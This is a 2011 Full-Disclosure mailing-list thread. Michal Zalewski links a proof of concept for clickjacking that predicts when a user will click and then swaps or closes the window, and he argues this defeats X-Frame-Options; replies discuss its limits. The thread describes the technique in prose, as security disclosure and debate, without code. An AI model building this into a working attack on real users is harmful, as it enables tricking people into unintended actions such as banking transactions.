Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
Because it's bugtraq / full-disclosure, where people generally talk about vulnerabilities... Sure thing. Complaining about patches that don't do anythinghttp://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.htmlis a plus to your reputation, I guess, right? Finding tangible solutions to your problems means that eventually you'll loose the job. I'm not sure I follow your drift about Firefox, I don't believe it's mentioned anywhere. Indeed, you didn't mention Firefox. Someone else did. Why? It's harder to predict how much it would take for a page to load, as well as your caching concept will fail when the target in question can only be invoked by the user. Also, there's the situation where a simple click won't get you anywhere, for instance, in cases where a user has to enter his credentials as well as to confirm the action. Chris. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
At the risk of annoying everyone... I think we greatly underappreciate the extent to which JavaScript allows you to exploit the limits of human perception. On modern high-performance systems, windows can be opened, positioned, and closed; and documents loaded and then navigated away from; so quickly that we can't even reliably notice that, let alone react consciously. The PoC I posted here earlier this week (http://lcamtuf.coredump.cx/switch/) demonstrates one example of page transitions occurring so fast that you don't register it; and some of my earlier posts outlined the exploitation of page switching to exploit browser UIs (e.g. http://lcamtuf.coredump.cx/ffgeo2/). Today, I wanted to share this brief demonstration of an attack that should hopefully illustrate why our current way of thinking about clickjacking (and the possible defenses, such as X-Frame-Options) is flawed: http://lcamtuf.coredump.cx/clickit/ The basic idea here is that instead of placing the UI you want to tamper with in an invisible or only partly-visible iframe, you can achieve a similar effect simply by predicting the time of a premeditated click (which is fairly easy if you look at mouse velocity and distance to the expected destination), and then either destroying the current window, or navigating to a different document (in this case, a cheesy banking site). While everything about this exploit is extremely goofy, and I put no effort into making the transitions less obvious, it should still demonstrate the issue neatly. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
Its awesome ... and works, but, yes conditions must be met for firefox8 still... this is 2011 ;s almost 12! this is, i guess a great PoC and info but, only some ppl realise the potentiall to this anyhow, thanks Mike,thats a GREAT job mate :) /xd On 11 December 2011 09:39, Michal Zalewski lcam...@coredump.cx wrote: At the risk of annoying everyone... I think we greatly underappreciate the extent to which JavaScript allows you to exploit the limits of human perception. On modern high-performance systems, windows can be opened, positioned, and closed; and documents loaded and then navigated away from; so quickly that we can't even reliably notice that, let alone react consciously. The PoC I posted here earlier this week (http://lcamtuf.coredump.cx/switch/) demonstrates one example of page transitions occurring so fast that you don't register it; and some of my earlier posts outlined the exploitation of page switching to exploit browser UIs (e.g. http://lcamtuf.coredump.cx/ffgeo2/). Today, I wanted to share this brief demonstration of an attack that should hopefully illustrate why our current way of thinking about clickjacking (and the possible defenses, such as X-Frame-Options) is flawed: http://lcamtuf.coredump.cx/clickit/ The basic idea here is that instead of placing the UI you want to tamper with in an invisible or only partly-visible iframe, you can achieve a similar effect simply by predicting the time of a premeditated click (which is fairly easy if you look at mouse velocity and distance to the expected destination), and then either destroying the current window, or navigating to a different document (in this case, a cheesy banking site). While everything about this exploit is extremely goofy, and I put no effort into making the transitions less obvious, it should still demonstrate the issue neatly. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 10/12/2011 22:39, Michal Zalewski wrote: At the risk of annoying everyone... I think we greatly underappreciate the extent to which JavaScript allows you to exploit the limits of human perception. On modern high-performance systems, windows can be opened, positioned, and closed; and documents loaded and then navigated away from; so quickly that we can't even reliably notice that, let alone react consciously. The PoC I posted here earlier this week (http://lcamtuf.coredump.cx/switch/) demonstrates one example of page transitions occurring so fast that you don't register it; and some of my earlier posts outlined the exploitation of page switching to exploit browser UIs (e.g. http://lcamtuf.coredump.cx/ffgeo2/). Today, I wanted to share this brief demonstration of an attack that should hopefully illustrate why our current way of thinking about clickjacking (and the possible defenses, such as X-Frame-Options) is flawed: http://lcamtuf.coredump.cx/clickit/ The basic idea here is that instead of placing the UI you want to tamper with in an invisible or only partly-visible iframe, you can achieve a similar effect simply by predicting the time of a premeditated click (which is fairly easy if you look at mouse velocity and distance to the expected destination), and then either destroying the current window, or navigating to a different document (in this case, a cheesy banking site). While everything about this exploit is extremely goofy, and I put no effort into making the transitions less obvious, it should still demonstrate the issue neatly. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Looks Like I won Michal. Where's my prize? Clever stuff. This kind of thing has occurred to me as system and indeed network/broadband speed have increased. One time a flashing of a neon on a router or modem or the a flash of a window on a desktop gave some indication of data ingress or egress. Nowadays it's done and over with before the user even realises something is afoot. I had to enable Javascript though. I guess I trust you not to burn my ass. There are not many links posted on this list which I would click with javascript enabled. Thanks for your insights and the education Dave -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTuPrVrIvn8UFHWSmAQJcJAgAqtAh+2LMzLOefwX31DZRNtoMgjWRt2yc 5CxN6uhnli97D9qJWDYOBYWJhO0/IV9zxmdVdQ5Pt+4LxPz2ollUFHbzD5vIWUd/ bYVE5x+cWgt8ZCRbJD5VNZcxYP4QsqRYlVspPcVjeVqKV26qYbCMPF83c/OtNiuR wZq/RmsJHrLWydFbNQfDGI/ufnwYLJEiH4GwqHxIjsajLOqBGztxPcWkIkfDDDQd tbPx49JF8e04aXqdAZlGxFV/sKTJVhaKsKPbUYiVGZF/vYbcFFO3eKF0s39hbBND 5rLH1qmEfzaC799bCZ/8tT/2/EA4xtZjJGrwzyNjA84eEL0J9g2PCw== =10aN -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] silly PoCs continue: X-Frame-Options give you less than expected
Interesting stuff indeed. However, I don't see you talk about a solution. Why is that? Because it's bugtraq / full-disclosure, where people generally talk about vulnerabilities... I'm not sure I follow your drift about Firefox, I don't believe it's mentioned anywhere. Anyhow, correct me if I'm wrong, but this concept won't work when the attacked site requires multiple user interaction, right? As in, the user will notice something amiss the second time. Why? /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/